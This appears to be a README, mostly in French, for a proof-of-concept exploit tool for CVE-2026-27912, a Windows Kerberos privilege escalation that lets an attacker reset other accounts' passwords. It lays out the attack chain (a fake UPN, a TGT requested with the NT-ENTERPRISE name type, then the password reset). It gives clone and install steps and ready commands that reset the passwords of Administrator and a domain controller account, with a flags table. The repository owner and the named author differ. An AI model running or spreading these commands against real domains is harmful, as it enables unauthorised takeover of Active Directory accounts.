
PoC pour CVE-2026-27912 - Élévation de privilèges Windows Kerberos (ResetNightmare). Réinitialisation non autorisée du mot de passe via une faille Kerberos. Pour la recherche en sécurité uniquement.
CVE-2026-27912 - Vulnérabilité d'élévation de privilèges dans Kerberos Windows
ResetNightmare - Réinitialisation de mot de passe non autorisée via une faille du protocole de changement de mot de passe de Kerberos.
| Champ | Valeur |
|---|---|
| CVE | CVE-2026-27912 |
| Titre | Vulnérabilité d'élévation de privilèges dans Kerberos Windows |
| CVSS | 8.0 HIGH (CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) |
| CWE | CWE-285: Autorisation inappropriée |
| Publié | 14 avril 2026 |
| Corrigé | avril 2026 |
1. Attacker has/creates account with UPN write permissions
2. Sets fake UPN to target's sAMAccountName
3. Requests TGT with NT-ENTERPRISE name type
4. Clears their own UPN
5. Uses TGT to reset target's password
6. Verifies password change success
Install-WindowsFeature RSAT-AD-PowerShell)# Clone repository
git clone https://github.com/oxstussz-eng/Kerberos-CVE-2026-27912.git
cd Kerberos-CVE-2026-27912
# Install dependencies
pip install -r requirements.txt
python resetnightmare.py -t Administrator -p NewPass123 -u AttackUser -up AttackPass
python resetnightmare.py -t DC01$ -p NewPass123 -u AttackUser -up AttackPass -c
python resetnightmare.py -t Admin -p NewPass -u NewUser -up Pass -path "OU=Temp,DC=domain,DC=local"
python resetnightmare.py -t Administrator -p NewPass123 -u AttackUser -up AttackPass -v
Réservé aux tests de sécurité autorisés et à la recherche pédagogique.
L'accès non autorisé à des systèmes informatiques est illégal. L'auteur décline toute responsabilité en cas d'utilisation abusive de ce logiciel.
n0vax1337 / Chercheur en sécurité
Licence MIT - voir LICENSE
Dernière mise à jour : 2026
| Flag | Description | Défaut |
|---|
-t / --target | Nom du compte cible | requis |
-p / --new-password | Nouveau mot de passe pour la cible | requis |
-u / --upn-user | Compte sur lequel définir un faux UPN | requis |
-up / --upn-password | Mot de passe du compte UPN | requis |
-c / --computer | UPNUser est un compte d'ordinateur | drapeau |
-r / --rubeus-path | Chemin vers Rubeus.exe | Rubeus.exe |
-e / --encryption | Type de chiffrement pris en charge | AES256 |
-path / --create-path | Chemin OU pour créer le nouveau compte | "" |
-d / --dc | Nom du contrôleur de domaine | détection automatique |
-v / --verbose | Sortie verbeuse | drapeau |